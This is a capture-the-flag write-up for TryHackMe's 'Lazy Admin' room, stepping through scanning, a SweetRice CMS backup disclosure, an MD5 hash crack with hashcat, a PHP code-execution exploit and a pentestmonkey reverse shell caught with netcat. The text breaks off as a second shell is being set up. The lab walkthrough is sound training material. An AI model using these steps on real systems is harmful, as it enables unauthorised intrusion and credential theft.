Tryhackme.com – Lazy Admin challenge notes

URL: https://tryhackme.com/room/lazyadmin

If you’re going to be doing a lot of CTF challenges then it might be worth adding the following function to your .zshrc or .bashrc using:

So the first command is putting the function into your .zshrc file but can also be done with .bashrc.

Then the second command is updating the variables defined in your .zshrc file.

The third command is just to make sure that the function is there for sanity.

Now to create a thm directory with the challenge name and cd into it just run:

$ mkcd thm/lazyadmin

So lets now start a nmap scan to see what ports are open:

$ nmap -sC -sV -oN nam-scan $IP

Port 80 is open so let’s have a look in a browser what it shows:

$ firefox http://$IP

Nothing much really in the source so lets run robuster to see what directories it picks up on but the wordlist directory may differ for you:

$ dirbuster dir -u http://$IP -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt

Let’s now scan with nikto –
Nikto is a tool that can scan web servers and web applications for various security issues, such as outdated software, misconfigurations, vulnerabilities, and more.

$ nikto -h http://$IP |tee nikto.log

gobuster above has found the directory /content so let’s take a look at that. Sometimes you may have to run Firefox as non-root user so you use something like:

$ sudo -u kali firefox http://$IP/content

If not then you can run the following as root:
$ firefox http://$IP/content

We can see that it’s running a CMS called SweetRice you could look to see if there’s any version numbers in the source but on this occasion there is nothing so let’s move on:

$ wget -qO- http://$IP/content |grep -i version

Let’s see if there is any exploits for the CMS using searchsploit:

$ searchsploit sweetrice

I can see there is a PHP code execution exploit which looks interesting so let’s have a look what that is with:

$ searchsploit -x php/webapps/40700.html

The next commands are me grabbing that exploit and renaming it to exploit.html to be used:

$ searchsploit -x php/webapps/40700.html

$ mv 40700.html exploit.html

Now we need to make some changes in that exploit for it to work. Here is the original:

I have adjusted the html section so we can use it to test the exploit by putting the IP of the target and changing the sweetrice part to /content:

Now let’s test the exploit by opening it in the browser with:

$ firefox exploit.html

But as you can see it’s a portal that requires credentials so I tried obvious ones like admin:admin, admin:password, admin:empty but none of them worked.

Let’s take a look at other exploits in searchsploit using the same as before:

The one I have highlighted looks interesting so let’s take a look at this backup disclosure exploit:

Let’s have a gander:

Interesting it appears that going to that link may show details so let’s give that a go to see what we find:

$ curl http://$IP/content/inc/mysql_backup

The appears to be a hyperlink to a potential sql file so see if there are any user or password details using:

$ wget -qO- http://$IP/content/inc/mysql_backup/mysql_backup_20191129023059-1.5.sql |egrep -i “user|pass”

That looks like the user is <blank> and there is a hash which I have highlighted. No spoilers so I have covered the user.

So now I want to see if I have the rockyou.txt file to use hash cat and potentially get the password in that hash using:

$ find / -name rockyou.txt

Let’s pop that hash into a file called md5.txt for now with the following:
$ echo “42f749ade7f9e195bf475f37a44cafcb” > md5.txt

Then run hashcat against the hash using:
$ hashcat -m 0 -a 0 md5.txt /usr/share/wordlists/rockyou.txt

and there is the password we need. No spoilers I have covered the password.

So let’s try the exploit in the portal now to see if it allows us to log in and exploit:

$ firefox exploit.html

No spoilers so I have covered the username.

The lets visit the following URL like the exploit suggests:
$ firefox http://$IP/content/inc/ads/hacked.php

But looking at the page it looks like it hasn’t worked.

But if we run it again you will see now it shows the script hacked:

Now let’s try the URL again but using:
$ firefox http://$IP/content/inc/ads/hacked.php

We can see that it exposes a php info file with the version and a few other details.

Let’s grab a php reverse shell and see if we can give that a go and get a reverse shell on the server using:
$ wget -qO- https://raw.githubusercontent.com/pentestmonkey/php-reverse-shell/master/php-reverse-shell.php > revshell.php
$ nano revshell.php

Now we need to adjust the revshell.php so it has our local IP and a point of your choosing. I decided to use 6666 as always. So I need to now get my local IP:

Here are the lines in the script I have adjusted:

Then copy all of the contents of the revshell.php and paste them into the exploit.html file under the php tags:

I have also changed the value from “hacked” to “shell”:

Now let’s give that a go again with:
$ firefox exploit.html &

Now we can see the shell we can visit it but first we need to open a listener using netcat:

$ nc -lvnp 6666

Now we can visit our shell using:
$ firefox http://$IP/content/inc/ads/shell.php

Now going back to our listener we have the following:

Now with the shell we can start looking around for flags to answer any challenge questions.

Let’s see what files we have in /home/. There is a directory called itguy and I can see some interesting file names so I take a look and grab any loot I need.

There is a script called copy.sh and it looks like it can be ran so let’s copy what is already in that file and pop in our local IP on a different port so we can start another listener. So I have chosen port 5555 for this one started the listener with:
$ nc -lnvp 5555